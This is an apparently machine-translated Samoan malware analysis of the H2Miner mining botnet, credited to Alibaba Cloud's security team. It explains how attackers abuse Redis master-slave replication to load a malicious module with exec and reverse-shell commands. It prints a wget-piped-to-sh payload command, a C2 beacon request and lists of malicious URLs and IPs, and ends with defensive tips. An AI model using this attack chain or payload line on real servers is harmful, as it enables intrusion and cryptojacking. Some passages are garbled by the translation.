I se aso talu ai, na osofaia ai se tasi o sau galuega faatino e se anufe faapena. I le sailiga o se tali i le fesili "o le a lena mea?" Na ou mauaina se tala lelei a le Alibaba Cloud Security team. Talu ai ou te lei mauaina lenei tusiga i luga o Habré, na ou filifili ai e faaliliu faapitoa mo oe <3
ulufalega
Talu ai nei, na maua ai e le vaega saogalemu a Alibaba Cloud se faʻafuaseʻi o le H2Miner. O lenei ituaiga o anufe leaga e faʻaaogaina le leai o se faʻatagaina poʻo upu vaivai vaivai mo Redis e fai ma faitotoʻa i au faiga, pe a maeʻa ona faʻafetaui lana lava module leaga ma le pologa e ala i le master-slave synchronization ma mulimuli ane sii maia lenei module leaga i le masini osofaʻi ma faʻataunuʻu leaga. faatonuga.
I aso ua tuanaʻi, o osofaʻiga i luga o au faiga na faʻatinoina muamua i le faʻaaogaina o se metotia e aofia ai galuega faʻatulagaina poʻo SSH ki na tusia i lau masini ina ua uma ona ulufale le tagata osofaʻi i Redis. O le mea e lelei ai, o lenei metotia e le mafai ona faʻaaoga soo ona o faʻafitauli i le faʻatagaina o faʻatagaga poʻo ona o faʻasologa eseese o faiga. Ae ui i lea, o lenei metotia o le utaina o se module leaga e mafai ona faʻatinoina saʻo poloaiga a le tagata osofaʻi pe maua le avanoa i le atigi, lea e lamatia mo lau masini.
Ona o le numera tele o Redis servers talimalo i luga o le Initaneti (toetoe lava 1 miliona), o le vaega saogalemu a Alibaba Cloud, o se faʻamanatuga faauo, fautuaina e le faʻasoa e tagata faʻaoga le Redis i luga o le initaneti ma siaki e le aunoa le malosi oa latou faʻaupuga ma pe o latou faʻafefe. filifiliga vave.
H2Miner
H2Miner o le mining botnet mo Linux-based system e mafai ona osofaʻia lau masini i ni auala eseese, e aofia ai le leai o se faʻatagaga ile Hadoop yarn, Docker, ma Redis remote command execution (RCE) faʻafitauli. O se botnet e galue e ala i le siiina mai o tusitusiga leaga ma mea leaga e maina ai au faʻamatalaga, faʻalautele le osofaʻiga i luga ole laiga, ma tausia le faʻatonuga ma le pulea (C&C) fesoʻotaʻiga.
Redis RCE
O le malamalama i lenei mataupu na faʻasoa e Pavel Toporkov i ZeroNights 2018. A maeʻa le version 4.0, e lagolagoina e Redis se faʻapipiʻi faʻapipiʻi faʻapipiʻi e tuʻuina atu ai i tagata faʻaoga le mafai ona utaina ina ia faʻapipiʻi faila ma C i Redis e faʻatino ai faʻatonuga a Redis. O lenei galuega, e ui ina aoga, o loʻo i ai se faʻafitauli lea, i le master-slave mode, faila e mafai ona faʻatasi ma le pologa e ala i le fullresync mode. E mafai ona faʻaogaina e se tagata osofaʻi e faʻafeiloaʻi faila leaga. A maeʻa le fesiitaiga, e utaina e le au osofaʻi le module i luga o le osofaʻiga Redis faʻataʻitaʻiga ma faʻatino soʻo se poloaiga.
Su'esu'ega Anufe Malware
Talu ai nei, na iloa ai e le Alibaba Cloud security team o le tele o le H2Miner malicious miner group ua faafuasei ona faateleina. E tusa ai ma le auʻiliʻiliga, o le faʻagasologa masani o osofaʻiga e faʻapea:
H2Miner faʻaaoga RCE Redis mo se osofaʻiga atoa. E osofaʻia muamua e le au osofaʻi 'auʻaunaga Redis e leʻi puipuia poʻo 'auʻaunaga e iai faʻamatalaga vaivai.
Ona latou faaaogaina lea o le poloaiga config set dbfilename red2.so e sui le igoa faila. A maeʻa lenei mea, e faʻatino e le au osofaʻi le faʻatonuga slaveof e fa'atulaga le tuatusi fa'akomupiuta matai-pologa.
A faʻavaeina e le osofaʻiga a Redis se fesoʻotaʻiga matai-pologa ma le Redis leaga o loʻo umia e le tagata osofaʻi, e tuʻuina atu e le tagata osofaʻi le module faʻamaʻi e faʻaaoga ai le fullresync poloaiga e faʻamaopoopo faila. O le faila red2.so o le a sii mai i le masini osofaʻi. Ona faʻaaoga lea e le au osofaʻi le ./red2.so loading module e utaina ai le faila lea. E mafai e le module ona faʻatino faʻatonuga mai se tagata osofaʻi pe amataina se fesoʻotaʻiga faʻasolosolo (faitotoa i tua) e maua ai le avanoa i le masini osofaʻi.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
Ina ua uma ona faatino se poloaiga leaga e pei o / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, o le a toe setiina e le tagata osofaʻi le igoa faila faila ma aveese le module system e faʻamamā ai faʻailoga. Ae ui i lea, o le red2.so faila o le a tumau pea i luga o le masini osofaʻi. Ua fautuaina tagata faʻaoga e faʻalogo i le i ai o se faila masalomia i totonu o le pusa o latou Redis faʻataʻitaʻiga.
I le faaopoopo atu i le fasiotia o nisi o faiga leaga e gaoi ai punaoa, na mulimuli ai le tagata osofaʻi i se tusitusiga leaga e ala i le siiina mai ma le faʻaogaina o faila binary leaga i. . O lona uiga o le igoa o le faagasologa poʻo le igoa faʻatonu o loʻo i ai kinsing i luga o le talimalo e ono faʻaalia ai o lena masini na aʻafia i lenei siama.
E tusa ai ma taunuʻuga faʻainisinia, o le malware e masani ona faʻatinoina galuega nei:
- Tu'u i luga faila ma fa'atino
- Maina
- Fa'atumauina feso'ota'iga a le C&C ma le fa'atinoina o fa'atonuga a tagata osofa'i
Fa'aoga le masscan mo su'esu'ega fafo e fa'alautele ai lau fa'aaafiaga. E le gata i lea, o le tuatusi IP o le C & C server e faigata ona faʻamaonia i le polokalame, ma o le a faʻafesoʻotaʻi le tagata osofaʻi ma le fesoʻotaʻiga fesoʻotaʻiga C & C e faʻaaoga ai talosaga HTTP, lea o loʻo faʻaalia ai faʻamatalaga zombie (server compromised) i le ulutala HTTP.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Isi auala osofa'i
Tuatusi ma so'oga na fa'aogaina e le anufe
/faiga
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
s&c
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
Tip
Muamua, e le tatau ona maua le Redis mai le Initaneti ma e tatau ona puipuia i se faʻaupuga malosi. E taua foi le siakiina e le au faipisinisi e leai se red2.so faila i le Redis directory ma e leai se "kinsing" i le faila / igoa faʻagasologa i luga o le talimalo.
puna: www.habr.com